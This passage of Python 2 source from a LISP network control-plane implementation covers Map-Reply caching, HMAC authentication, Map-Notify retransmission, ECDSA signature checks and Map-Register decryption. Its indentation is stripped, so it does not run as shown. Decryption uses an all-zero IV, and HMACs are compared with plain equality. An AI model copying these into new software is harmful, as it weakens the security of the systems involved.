if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
        # cache a more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
            # Add itr-in timestamp if telemetry data is included in the RLOC record.
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
            # different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
            # Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
        # be behind the same NAT as this ITR. This ITR, however, could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
                # An RTR should not put RTR RLOCs in its map-cache, but xTRs
                # do. Non-RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
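#
# Illustrative usage sketch, mirroring the call made in
# lisp_send_map_register() further below: once the Map-Register records are
# encoded, the caller fills in the authentication field with the site's
# shared secret before sending. The password value here is hypothetical:
#
#   packet = lisp_compute_auth(packet, map_register, "site-shared-secret")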
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
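#
# Illustrative sketch of the do_hex flag: the sender stores the raw digest
# in the packet (do_hex False, as in lisp_compute_auth() above) while the
# receiver compares a hex string (do_hex True, as in lisp_verify_auth()
# below). The password value is hypothetical:
#
#   raw = lisp_hash_me(packet, LISP_SHA_256_128_ALG_ID, "secret", False)
#   hexed = lisp_hash_me(packet, LISP_SHA_256_128_ALG_ID, "secret", True)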
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
    # Print differences if the hashes do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
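#
# The re-arming timer pattern used above, as a minimal self-contained
# sketch. The names and the 5-second interval are illustrative only and are
# not used by this file:
#
#   def retransmit(state):
#       if (state["tries"] >= 3): return
#       state["tries"] += 1
#       # ... resend the packet here ...
#       state["timer"] = threading.Timer(5, retransmit, [state])
#       state["timer"].start()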
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
    # Build RLOC-records for the merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
    map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
    # Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change the Map-Notify message to have a new type (Map-Notify-Ack) and
# re-authenticate the message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
    # Send Map-Notify to xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
        # (S,G) RLOC-set could be empty when the last RLE goes away. We will
        # have to search all individual registrations looking for RTRs.
        #
        # We store in a dictionary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
        # to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
            # Map-Notify to the RTR instead of the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
            # No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
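#
# For illustration, a JSON RLOC-record that satisfies the "signature" check
# above could carry a payload like the following. The values are
# hypothetical; the "signature-eid" key is optional and is consumed by
# lisp_verify_cga_sig() below:
#
#   { "signature-eid" : "[1000]fd4f:5b9f:f67c:6dbd::1",
#     "signature" : "MEUCIQDx...base64...==" }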
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
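#
# Worked example, reusing the sample EID from the header comment above: if
# the matching eid-prefix has mask-length 48, hash_mask_len is 128 - 48 = 80
# and the loop extracts the low-order 80 bits as five 16-bit groups. The
# lisp_address() arguments mirror how lisp_verify_cga_sig() builds sig_eid:
#
#   eid = lisp_address(LISP_AFI_IPV6,
#       "fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430", 0, 0)
#   lisp_get_eid_hash(eid)    # returns "6dbd:3799:48e1:c6a2:9430"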
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_eid, pubkey, True/False]. Values can be None but the last
# boolean indicates whether the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
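#
# Illustrative sketch: for an EID whose crypto-hash is
# "6dbd:3799:48e1:c6a2:9430", the lookup above is done on the
# distinguished-name EID "hash-6dbd:3799:48e1:c6a2:9430" in the same
# instance-ID, and the registered JSON RLOC is expected to carry a key of
# the form (value hypothetical):
#
#   { "public-key" : "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0K..." }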
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
    # Lookup CGA hash in mapping database to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
    # a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
    # Note that to use sha256 you need a NIST256p curve.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
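#
# Signer-side sketch for interoperability with the verifier above. This is
# illustrative only; the key generation, EID string, and base64 handling are
# assumptions and are not code used by this file. The signed data is the
# string "[<iid>]<eid>" and the curve must be NIST256p so sha256 can be used:
#
#   key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
#   sig = key.sign("[1000]fd4f:5b9f:f67c:6dbd::1", hashfunc=hashlib.sha256)
#   rloc_json = { "signature" : binascii.b2a_base64(sig) }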
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non-encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
    # Parse the first 4 bytes, which are not encrypted. If packet is not
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
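#
# For illustration, the bit extraction above applied to a hypothetical
# host-ordered header word of 0xe000: bit 13 is the e-bit and bits 14-16
# carry the key-id, so this word decodes as an encrypted Map-Register using
# key-id 3:
#
#   header = 0xe000
#   e_bit = (header >> 13) & 0x1      # 1, packet body is encrypted
#   ekey_id = (header >> 14) & 0x7    # 3, index into lisp_ms_encryption_keys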
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
    # will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
